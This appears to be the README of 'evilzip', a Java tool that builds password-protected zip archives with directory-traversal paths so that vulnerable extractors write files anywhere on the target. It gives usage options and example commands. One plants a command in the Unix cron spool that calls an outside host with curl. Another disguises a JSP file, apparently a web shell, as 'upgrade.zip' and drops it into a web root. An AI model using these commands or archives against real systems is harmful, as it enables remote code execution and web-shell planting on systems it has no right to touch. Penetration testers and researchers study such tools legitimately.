evilzip lets you create a zip file (with a password) that contains files with directory traversal characters in their embedded path.

evilzip

logs

  • 20210701 Fixed a permissions issue so that extracted files have read, write and execute permissions by default.

About

evilzip lets you create a zip file (with a password) that contains files with directory traversal characters in their embedded path. Most commercial zip programs (WinZip, etc.) prevent extraction of zip files whose embedded files contain paths with directory traversal characters. However, many software development libraries do not include these same protection mechanisms (e.g. Java, PHP). If a program or library does not reject directory traversal characters, evilzip can be used to generate zip files that, once extracted, place a file at an arbitrary location on the target system.

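About the project

evilarc, the tool originally used to create malicious archives, does not support password-protected archives and could not be modified to do so, because the zipfile module it uses does not support compressing with a password. That is why this project exists. On top of evilarc, it adds some features I use often, such as generating, with a single parameter, an archive that traverses to the Unix scheduled tasks directory.

The parameters are as follows: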

╭─ fucker ~/Coding/Java/Intellij/evilzip/
╰─ java -jar evilzip.jar -h
Usage: java -jar EvilZip.jar [options]
  Options:
    -f, --file
      File to input archive.
      Default: root
    -p, --path
      Path to include in filename after traversal
      Default: var/spool/cron/
    -pwd, --password
      ZIP file encrypt password.
    -o, --output
      File to output archive.
      Default: evil.zip
    -d, --depth
      Number directories to traverse.
      Default: 8
    -t, --type
      OS platform for archive (win|unix).
      Default: unix
    -c, --cmd
      Command to execute.
    -h, --help
      Show this message

Some tips

Quickly generate an archive that executes a command on a Unix system (directory traversal to the scheduled tasks):

java -jar evilzip.jar -c "curl xxx.dnslog.com"

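Read the local gaga.jsp and have it traverse 10 directory levels so that it is finally extracted to /wwwroot/xxxx/gaga.jsp, with the extraction password update-password and the output archive named upgrade.zip: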

java -jar evilzip.jar -f gaga.jsp -d 10 -p wwwroot/xxxx/ -o upgrade.zip -t unix -pwd "update-password"

Most parameters have default values, so they do not need to be specified.

Releases(1.1)
Owner
鸭王
Infosec Researcher|Security Developer|Java|C#|Golang|C++